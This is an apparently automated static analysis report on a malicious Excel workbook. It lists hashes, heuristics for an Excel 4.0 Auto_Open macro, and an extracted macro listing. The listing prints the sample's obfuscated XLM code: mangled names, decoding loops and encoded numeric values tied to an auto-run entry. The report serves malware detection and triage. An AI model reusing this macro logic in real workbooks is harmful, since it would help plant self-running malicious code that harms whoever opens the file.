Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b992bfe2dbf0a2bb…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-27 11:42:33 Authoring application: Microsoft Excel First seen: 2021-01-15
MD5: 91fafbd1693457ae7f1a3b259f01219e SHA-1: 2faba3b78d5fdde7b8044da18c0346b5b03391dd SHA-256: b992bfe2dbf0a2bb0565dab01fa054ab031da1d8e282be441aee8d5daf09ebef
142 Risk Score

Heuristics 4

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6837 bytes
SHA-256: 654f47a6b276f1a7316a793303d502c2a27cf71e6bba74571a2c3a51cf29b5a0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 40 identifiers look randomly generated (e.g. 'kcwbDeDSdxTV') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  iRxLdvxxF
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C158 
' 0018     22 LABEL : Cell Value, String Constant - FNuDQNs len=0 
' 0018     24 LABEL : Cell Value, String Constant - fwouYWWfR len=0 
' 0018     24 LABEL : Cell Value, String Constant - GCLdZUQhD len=0 
' 0018     26 LABEL : Cell Value, String Constant - GktZFDHVKhM len=0 
' 0018     25 LABEL : Cell Value, String Constant - gVdjHayIBi len=0 
' 0018     22 LABEL : Cell Value, String Constant - HHBliDl len=0 
' 0018     24 LABEL : Cell Value, String Constant - HzFqoAQsA len=0 
' 0018     27 LABEL : Cell Value, String Constant - kcwbDeDSdxTV len=0 
' 0018     23 LABEL : Cell Value, String Constant - kiYsRTJn len=0 
' 0018     23 LABEL : Cell Value, String Constant - ksHhDTSd len=0 
' 0018     26 LABEL : Cell Value, String Constant - MwZSqPjSrco len=0 
' 0018     22 LABEL : Cell Value, String Constant - NZnauZO len=0 
' 0018     24 LABEL : Cell Value, String Constant - OHJBlKnYn len=0 
' 0018     27 LABEL : Cell Value, String Constant - oXGORGsKHDmE len=0 
' 0018     27 LABEL : Cell Value, String Constant - rNFfYepuUuiP len=0 
' 0018     22 LABEL : Cell Value, String Constant - rUKtCSL len=0 
' 0018     22 LABEL : Cell Value, String Constant - TunCuSN len=0 
' 0018     23 LABEL : Cell Value, String Constant - vbcpVZHy len=0 
' 0018     27 LABEL : Cell Value, String Constant - WYctQjcLqoZU len=0 
' 0018     27 LABEL : Cell Value, String Constant - YoeYNuvpHYCd len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  iRxLdvxxF,C64,"SET.NAME("fwouYWWfR",0+VALUE("0"))",""
'  iRxLdvxxF,C69,"SET.NAME("HzFqoAQsA",fwouYWWfR)",""
'  iRxLdvxxF,C72,"SET.NAME("TunCuSN",fwouYWWfR)",""
'  iRxLdvxxF,C76,"SET.NAME("kiYsRTJn",COUNTA(OHJBlKnYn))",""
'  iRxLdvxxF,C78,"SET.NAME("oXGORGsKHDmE",COUNTA(YoeYNuvpHYCd))",""
'  iRxLdvxxF,C82,[],""
'  iRxLdvxxF,C86,"SET.NAME("vbcpVZHy","")",""
'  iRxLdvxxF,C89,"HzFqoAQsA",""
'  iRxLdvxxF,C93,"SET.NAME("NZnauZO",HLOOKUP("*",OHJBlKnYn,HzFqoAQsA,FALSE))",""
'  iRxLdvxxF,R96,"",-249.00000000000000000000
'  iRxLdvxxF,C97,"GCLdZUQhD",""
'  iRxLdvxxF,R97,"",-242.00000000000000000000
'  iRxLdvxxF,R98,"",-305.00000000000000000000
'  iRxLdvxxF,R99,"",-320.00000000000000000000
'  iRxLdvxxF,C100,"SET.NAME("FNuDQNs",fwouYWWfR)",""
'  iRxLdvxxF,R100,"",-383.00000000000000000000
'  iRxLdvxxF,R101,"",574.00000000000000000000
'  iRxLdvxxF,C102,[],""
'  iRxLdvxxF,C107,"FNuDQNs",""
'  iRxLdvxxF,C112,"GktZFDHVKhM",""
'  iRxLdvxxF,C116,"WYctQjcLqoZU",""
'  iRxLdvxxF,C120,"MwZSqPjSrco",""
'  iRxLdvxxF,C123,"SET.NAME("rNFfYepuUuiP",VALUE(HLOOKUP("*",YoeYNuvpHYCd,MwZSqPjSrco,FALSE)))",""
'  iRxLdvxxF,C126,"rUKtCSL",""
'  iRxLdvxxF,C131,"vbcpVZHy",""
'  iRxLdvxxF,C134,"TunCuSN",""
'  iRxLdvxxF,C136,NEXT(),""
'  iRxLdvxxF,C139,"ksHhDTSd",""
'  iRxLdvxxF,C144,[],""
'  iRxLdvxxF,C147,"HHBliDl",""
'  iRxLdvxxF,C151,NEXT(),""
'  iRxLdvxxF,C154,RETURN(),""
'  iRxLdvxxF,C175,"SET.NAME("gVdjHayIBi",C64)",""
'  iRxLdvxxF,C177,"OHJBlKnYn",""
'  iRxLdvxxF,C181,"SET.NAME("YoeYNuvpHYCd",R67C13)",""
'  iRxLdvxxF,C183,"SET.NAME("HHBliDl",190)",""
'  iRxLdvxxF,C186,"SET.NAME("kcwbDeDSdxTV",3)",""
'  iRxLdvxxF,C189,gVdjHayIBi(),""
'  iRxLdvxxF,C190,HALT(),""